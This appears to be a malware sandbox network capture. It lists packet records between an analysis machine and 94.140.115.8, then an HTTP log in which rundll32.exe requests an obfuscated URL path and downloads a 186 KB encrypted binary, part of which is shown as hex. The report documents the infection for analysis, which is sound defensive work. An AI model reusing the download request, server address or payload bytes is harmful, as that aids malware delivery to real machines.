Apr 28, 2022 10:35:56.572985888 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.573054075 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.573055029 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.573079109 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.573146105 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.573154926 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.703841925 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704015017 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.704143047 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704207897 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704265118 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704289913 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.704466105 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.704562902 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704623938 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704663992 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.704667091 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704720974 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704766989 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.704777956 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704833984 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704870939 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.704890013 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.704936981 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.704951048 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705004930 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705045938 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.705046892 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705102921 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705149889 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.705159903 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705218077 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705224991 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.705256939 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705312014 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705327034 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.705373049 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705430031 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705431938 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.705507994 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.705516100 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705579042 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.705583096 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.705687046 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.788817883 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.788846016 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.788866997 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.788897038 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.788916111 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.788918972 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.788939953 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.788943052 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.788960934 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.788980961 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.788981915 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.789001942 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.789004087 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.789022923 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.789036989 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.789043903 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.789060116 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.789071083 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.789105892 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.820194006 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.820214987 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.820241928 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.820255041 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.820262909 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.820297003 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.820300102 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.835042000 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.835084915 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.835118055 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.835127115 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.835138083 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.835150003 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.835160017 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.835170031 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.835180998 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.835192919 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.835196972 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.835218906 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.835263014 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.837100983 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.837132931 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.837158918 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.837162018 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.837177992 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.837188005 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.837203979 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.837224007 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.890398026 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.890429020 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.890454054 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.890470028 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.890471935 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.890512943 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.890527964 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.908956051 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.908988953 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.909009933 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.909028053 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.909037113 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.909084082 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.909090996 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.911814928 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.911845922 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.911864996 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.911880016 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.911911964 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.911947012 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.911952019 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.950264931 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.950340033 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.950371027 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.950390100 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.950453997 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.950504065 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.950511932 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.950517893 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.957315922 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.957365036 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.957418919 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.957442999 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.957443953 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.957485914 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.957515955 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.957585096 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.971291065 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.971338034 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.971378088 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.971386909 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.971407890 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.971417904 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.971460104 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.971525908 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.972610950 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.972692966 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.972693920 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.972733974 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.972763062 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:56.972769022 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.972788095 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:56.972811937 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.009298086 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.009330988 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.009355068 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.009372950 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.009377003 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.009407997 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.009412050 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.009427071 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.026513100 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026546001 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026572943 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026590109 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026612997 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026637077 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026649952 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.026679993 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.026719093 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.026799917 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026817083 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.026932955 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.026967049 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.028388023 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.028418064 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.028440952 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.028472900 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.028484106 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.028501987 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.028533936 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.074335098 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.074366093 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.074390888 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.074405909 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.074409008 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.074445009 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.074449062 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.074451923 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.086582899 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.086617947 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.086644888 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.086659908 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.086688042 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.086736917 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.090893984 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.090950012 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.090967894 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.091000080 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.091002941 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.091016054 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.091048956 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.091065884 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.137269020 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.137303114 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.137326002 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.137342930 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.137367964 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.137402058 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.137406111 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.141597986 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.141625881 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.141649961 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.141666889 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.141689062 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.141707897 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.141735077 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.156900883 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.156928062 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.156946898 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.156963110 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.157017946 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.157088041 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.161371946 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.161396027 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.161413908 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.161459923 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.161459923 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.161505938 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.161523104 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.203655958 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.203707933 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.203793049 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.203819990 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.203864098 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.203866005 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.203874111 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.203978062 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.209512949 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.209569931 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.209675074 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.209673882 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.209733009 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.209742069 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.209748030 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.209822893 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.224351883 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.224402905 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.224431038 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.224451065 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.224502087 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.224555969 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.224562883 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.230319023 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.230356932 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.230381012 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.230406046 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.230427027 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.230499029 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.230535984 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.230542898 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.336009026 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.417376995 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.792884111 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.792939901 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:35:57.793004990 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:35:57.793056965 CEST	49755	80	192.168.2.3	94.140.115.8
Apr 28, 2022 10:37:02.793833017 CEST	80	49755	94.140.115.8	192.168.2.3
Apr 28, 2022 10:37:02.794017076 CEST	49755	80	192.168.2.3	94.140.115.8

HTTP Request Dependency Graph

94.140.115.8

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49755	94.140.115.8	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Apr 28, 2022 10:35:54.821196079 CEST	1233	OUT	GET /drew/50s8s_2Fm/cVudhHX9qhkwnZn8YGEa/1_2FluFvn0rgITgZHrA/wgcOmIc7KszdPMRNYAwCGU/riR21HHqBfnky/h3W8R7X2/i4XUx7MW7pUIRFpHREax99S/CeaSmQqUkf/_2FQJb20GfOBx67Hv/vcYd4qEFb5vs/GCAhrG_2F_2/Fs8jogZPWA_2BZ/E84C3VPBHuhbD17con0IW/u18AFJcaJWYZ53TT/SBbkABZO2lEW2gv/N0JCn4zxEtu_2BD1lC/F07n5Kpw2LWAlyB/hwLOToT.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 94.140.115.8 Connection: Keep-Alive Cache-Control: no-cache
Apr 28, 2022 10:35:55.231856108 CEST	1234	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Apr 2022 08:35:55 GMT Content-Type: application/octet-stream Content-Length: 186004 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="626a51eb29194.bin" Data Raw: 82 b0 5a f9 80 5c 88 d2 b9 a9 03 66 fc cb 05 5a 55 e1 a3 0c 1d f4 74 76 10 8c be b1 96 6a c9 05 cb 3a 20 f7 40 97 8d cf 82 7e d8 63 47 d6 66 53 a2 b2 df 46 50 eb 66 05 3b 69 3c 4e e7 2d b7 c5 9a 11 b9 f1 b6 05 bd 93 ed 4a 54 06 08 f8 24 04 14 8b 92 a3 63 12 78 a9 c3 92 cb d4 7c 87 14 e4 63 d4 05 20 f9 3c 6a 5f f1 7e 65 84 63 e2 4e 82 6e 48 23 ef 28 da 52 05 8e fb 30 d8 02 06 d9 d3 14 82 03 b0 45 35 de 9c 1f 71 d0 9b 3a c9 80 0c 04 e9 c4 55 c2 8e 9b 6b 71 37 e2 ab 42 c6 3a 26 d7 99 03 87 ed 51 05 fb a8 a8 86 c5 a1 e5 48 fd 9b 55 b0 f2 2d 73 08 e3 2f 3a bb 98 30 78 3c 0f 13 bf 4c 26 40 74 75 92 a2 bf 07 20 f8 3f 0a 84 8a ab fc df cf 71 74 b4 60 79 99 09 2d 7f 82 52 87 b6 5b 77 e2 98 6c 4b 07 fc 75 8b 6f 2e 0c 46 a5 fb cb 29 1a fd d8 c3 8d d4 6e 88 55 e5 34 e2 23 de c9 96 57 7e 4d 02 39 75 cb 23 c3 1e b7 9a d8 de 82 90 27 64 d6 fb 51 22 ec 6d 93 97 e8 7d 81 8c 5e 56 ae a1 23 f9 43 ad c1 0e 4c 7e 2f f7 4a f9 22 7c 26 e9 77 05 f2 81 80 74 bc 08 25 7f 80 7f c4 eb 84 4c ac 58 d2 03 f0 4a 39 cc 31 80 de 78 83 47 b7 4e c4 b8 56 a8 ad 9c 7d 09 0a 70 63 f8 9f 4a 53 24 3f 4a c8 58 39 a2 b7 9c 4a ef 6e 4a 5b f4 22 58 ba 98 04 7a 10 d5 aa fe 88 33 0c e5 14 16 6f 60 a5 50 24 b4 2a 29 d7 6b f0 76 b1 e2 fd fc 14 f6 86 09 f4 cc d3 9d f7 2e fd 1f f4 a0 ca fe e7 27 dd 71 dd dd 64 b5 31 24 30 94 6c ba 10 fc 1c dc 1d bb e6 97 84 46 58 ca 9c e6 ed 19 10 f6 cf a1 08 89 ff c8 d5 aa 0e 42 31 98 56 c5 75 60 2d ab e7 b0 3d a1 48 ed 3e 89 1b 2c 21 10 57 45 6e 61 aa 8f a5 ad a1 66 2b e2 ac 70 4f 75 c1 65 d0 45 ef 80 32 2b 20 e4 d8 4a da ea 62 0b 77 45 56 1d 01 fe 80 42 8f 6b 26 4f 6c 1d 53 82 9a 60 a2 db 4f fe 2c 50 1a 2b d0 73 cc 11 05 db 08 70 85 06 1f 8b 9c ea 4c f8 36 5a 6e a6 0e e3 02 59 b7 d5 cd 3b 24 ed d7 bf 65 b2 8a 84 7c 35 da 68 c0 2e cc 63 4e 6c b6 71 9a 51 95 6a 9a e1 e1 78 fb 92 40 9d 77 c6 d0 9a 02 5e fd e5 ca 48 a1 d1 c9 3f 81 de 26 d8 62 71 f2 91 36 fd 34 7c d5 0e 3e 11 7a 05 b6 84 b3 01 33 13 f0 a5 86 ee 24 b7 1e 71 3d 73 98 0c 6b 3b b1 21 28 04 71 0f da 1c 37 6e 5e 3f 29 06 e4 e0 6e c1 7d 2b a8 1e d9 fe e8 ae c8 27 e7 2f 17 f9 20 25 24 3f de 68 e7 f5 24 79 71 22 a2 52 95 43 c5 05 f4 4f 1b 7a a6 b9 2d c8 2a d5 3d 92 db 83 04 55 20 07 68 f7 3b 47 1a 47 62 e6 0a 9a ab c2 3a f9 95 2b 59 ff 50 44 c0 bd 3c d4 39 74 20 a7 fc bf d9 ab b2 a7 e4 4d ee 69 b4 4e 36 21 29 8a 39 0a ec 3b df 04 06 df 56 d4 10 92 74 a2 85 4c 1a d1 61 18 59 70 75 4e e9 ac 21 f0 9e e9 3c 7d 93 a9 4e ad 40 74 f0 cd 04 23 85 d8 62 16 75 5c 97 69 e3 16 65 d3 46 da 89 df 99 fb 57 32 2f b1 f2 35 24 bc d7 6d f5 01 bc ea fb a7 7d c5 d7 94 77 f9 50 ae 5d 7f 68 db 96 fa 5d 2d 47 68 bb 5d a9 41 93 11 90 87 87 82 32 7a ff 01 7a 72 5b b5 f2 b9 99 e6 32 1f 64 f2 b6 90 76 93 18 1b 0f ef 4c 57 80 cf 3a 59 8f b4 c3 d5 fc d2 cb c6 f9 01 4d c9 51 08 61 7a ad 91 e5 16 b0 ba 70 85 d9 7c 5d 96 9b 20 c5 23 f7 93 32 8d 34 8f 3d 39 c5 81 cf 4a 0b a6 f8 bc be 1b 3f 87 93 06 7c 29 ed 6a ba 6c 6a ff 37 9e 8d 30 81 6d e7 4e 8c 37 de f7 39 5f 8b 00 2f af 4d ea 56 2f 78 61 34 ce 07 d3 37 8b 51 99 02 dc 02 3f f4 31 de 2f 44 2f c5 e9 Data Ascii: Z\fZUtvj: @~cGfSFPf;i<N-JT$cx\|c <j_~ecNnH#(R0E5q:Ukq7B:&QHU-s/:0x<L&@tu 